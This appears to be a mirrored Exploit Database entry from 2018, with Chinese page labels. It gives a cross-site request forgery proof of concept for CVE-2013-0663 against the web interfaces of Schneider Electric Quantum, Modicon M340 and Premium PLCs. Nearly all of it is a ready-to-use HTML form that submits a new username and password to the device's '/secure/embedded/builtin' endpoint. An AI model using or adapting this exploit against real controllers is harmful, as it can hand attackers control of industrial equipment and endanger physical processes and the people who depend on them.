Schneider Electric PLCs – Cross-Site Request Forgery

• Exploit Database
• 121 阅读

• 作者： t4rkd3vilz
  日期： 2018-05-21
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44678/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

  # Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery # Date: 2018-05-12 # Exploit Author: t4rkd3vilz # Vendor Homepage: http://www.schneider-electric.com/ # Tested on: Windows # CVE: CVE-2013-0663 # Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000 # Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx # Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100 # Category: webapps   <html> <head> <title>CSRF POC</title> </head> <body> <form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()"> <table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0"> <tr> <td class="inputCell" width="200"> <div align="left"> <h5>Name:</h5> <script language="javascript" type="text/javascript"> <!--// paramLang(); switch(getLanguage()) {   default: document.write("Username :"); break; } //--> </script> </div> </td> <td class="inputCell" width="190"> <input type="text" name="user" size="20"> </td> </tr> <tr> <td class="inputCell" width="200"> <div align="left">& <h5>Pass:</h5> <script language="javascript" type="text/javascript"> <!--// switch(getLanguage()) { default: document.write("New password :"); break; } //--> </script> </div> </td> <td class="inputCell" width="190"> <input type="password" name="passwd" size="20"> </td> </tr> <tr> <td class="inputCell" width="200"> <div align="left"> <h5>Verify Pass:</h5> <script language="javascript" type="text/javascript"> <!--// switch(getLanguage()) {   default: document.write("Confirm password :"); break; } //--> </script> </div> </td> <td class="inputCell" width="190"> <input type="password" name="cnfpasswd" size="20"> </td> </tr> </table> <br> <div align="center"> <script language="javascript" type="text/javascript"> <!--// switch(getLanguage()) {   default: document.write(&apos;<input type="submit" name="subhttppwd" value="Change Password">&apos;); break; } //--> </script> <input type="submit" name="subhttppwd" value="Change Password"> </div> </form> <br> </td> </tr> <tr> <td align="center"> <br>   </body> </html>